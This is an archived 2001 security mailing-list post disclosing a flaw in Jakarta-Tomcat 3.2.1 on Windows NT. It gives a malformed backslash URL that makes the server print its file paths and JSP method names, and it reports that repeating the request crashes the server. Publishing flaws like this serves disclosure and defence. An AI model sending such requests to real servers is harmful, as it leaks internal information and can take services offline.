[LoWNOISE] Tomcat 3.2.1 ..0 DoS (WinNT)

From: ET LoWNOISE (etat_private)
Date: Thu Aug 16 2001 - 16:10:09 PDT

Next message: Seth Arnold: "Re: MS-DOS Filename/Directory Vulnerability"

Previous message: Felipe Moniz: "MS-DOS Filename/Directory Vulnerability"
Next in thread: Charles Miller: "Re: [LoWNOISE] Tomcat 3.2.1 ..0 DoS (WinNT)"
Reply: Charles Miller: "Re: [LoWNOISE] Tomcat 3.2.1 ..0 DoS (WinNT)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--[ LoWNOISE ]  Aug/2001
--[ Jakarta-Tomcat v3.2.1 Maybe Others ]

Tested on: Apache 1.3.19 (WinNT 4.0)

The Problems:

--[Path Revealing and Method discovery ]

Example:

http://host/\index.jsp

Error: 500
Location: /index.jsp
Internal Servlet Error:

org.apache.jasper.JasperException: Unable to compile class for JSP
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:482:
Method autenticate(java.lang.String) not found in class ENTERPRISE.login.
                if(pubBean.autenticate(password) != 0)
                                           ^
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:664:
Method 
Others methods...

NOTE: This info will help debug any jsp. And maybe give you some critical
info.

--[DoS]

On multiple request of the above URL the server will crash.

Plz confirm this on other versions.

Efrain 'ET' Torres
[LoWNOISE] Colombia
etat_private

Next message: Seth Arnold: "Re: MS-DOS Filename/Directory Vulnerability"
Previous message: Felipe Moniz: "MS-DOS Filename/Directory Vulnerability"
Next in thread: Charles Miller: "Re: [LoWNOISE] Tomcat 3.2.1 ..0 DoS (WinNT)"
Reply: Charles Miller: "Re: [LoWNOISE] Tomcat 3.2.1 ..0 DoS (WinNT)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Aug 16 2001 - 18:50:01 PDT